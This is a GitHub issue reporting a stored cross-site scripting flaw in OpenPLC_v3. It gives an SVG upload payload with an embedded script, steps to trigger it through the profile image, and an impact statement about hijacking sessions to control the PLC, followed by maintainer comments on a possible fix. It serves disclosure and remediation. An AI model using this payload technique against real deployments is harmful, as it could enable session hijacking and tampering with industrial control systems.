thiagoralves/OpenPLC_v3 #242: Vulnerability Found - Stored XSS via SVG File Upload

1d8, 2024-06-03:
Git: https://github.com/thiagoralves/OpenPLC_v3

# Stored XSS Via Profile Image Upload

## Reproduction

Use this payload & save it as `image.svg`:
```svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by 1d8");
</script>
</svg>
```
1. Login > Users > Select a user to edit
2. Upload the `image.svg` as the picture
3. Save changes
4. Right-click the profile image in upper-right hand corner > Open image in new tab
5. [image]

Our XSS payload is now executed

## Impact

Since we can inject our own Javascript, we can abuse the user's logged in cookie to do things such as start/stop the PLC or interact with the Slave devices

lhartmann, 2025-03-20:
Is this fixed after [this commit](https://github.com/thiagoralves/OpenPLC_v3/commit/d1b1a3b7e97f2b3fef0876056cf9d7879991744a)?

thiagoralves, 2025-03-20:
Possibly, because I think it won’t allow svg files anymore, but I haven’t tested